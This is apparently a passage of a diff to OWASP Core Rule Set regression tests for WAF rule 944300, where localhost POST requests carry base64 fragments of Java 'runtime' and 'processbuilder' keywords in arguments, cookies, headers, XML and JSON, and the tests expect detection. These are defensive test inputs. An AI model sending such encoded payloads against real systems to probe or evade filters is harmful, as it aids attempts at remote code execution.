"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HJ1bnRpbWU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HJ1bnRpbWU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 15 desc: "Cookie name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HJ1bnRpbWU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HJ1bnRpbWU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 16 desc: "Request header test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HJ1bnRpbWU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HJ1bnRpbWU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 17 desc: "XML attribute value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 18 desc: "XML element value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log: + expect_ids: [944300] + - test_id: 19 desc: "Nested XML element value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log: + expect_ids: [944300] + - test_id: 20 desc: "Content-Type text/plain includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log: + expect_ids: [944300] + - test_id: 21 desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HJ1bnRpbWU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HJ1bnRpbWU\"}" + output: + log: + expect_ids: [944300] + - test_id: 22 desc: "Content-Type application/json arg name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HJ1bnRpbWU\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HJ1bnRpbWU\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 23 desc: "Argument test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log: + expect_ids: [944300] + - test_id: 24 desc: "Argument name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l=test" + output: + log: + expect_ids: [944300] + - test_id: 25 desc: "Cookie test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BydW50aW1l - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BydW50aW1l + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 26 desc: "Cookie name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BydW50aW1l=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BydW50aW1l=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 27 desc: "Request header test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BydW50aW1l - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BydW50aW1l + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 28 desc: "XML attribute value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 29 desc: "XML element value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log: + expect_ids: [944300] + - test_id: 30 desc: "Nested XML element value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log: + expect_ids: [944300] + - test_id: 31 desc: "Content-Type text/plain includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log: + expect_ids: [944300] + - test_id: 32 desc: "Content-Type application/json arg value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BydW50aW1l\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BydW50aW1l\"}" + output: + log: + expect_ids: [944300] + - test_id: 33 desc: "Content-Type application/json arg name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BydW50aW1l\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BydW50aW1l\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 34 desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log: + expect_ids: [944300] + - test_id: 35 desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI=test" + output: + log: + expect_ids: [944300] + - test_id: 36 desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvY2Vzc2J1aWxkZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvY2Vzc2J1aWxkZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 37 desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvY2Vzc2J1aWxkZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvY2Vzc2J1aWxkZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 38 desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvY2Vzc2J1aWxkZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvY2Vzc2J1aWxkZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 39 desc: "XML attribute value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 40 desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log: + expect_ids: [944300] + - test_id: 41 desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log: + 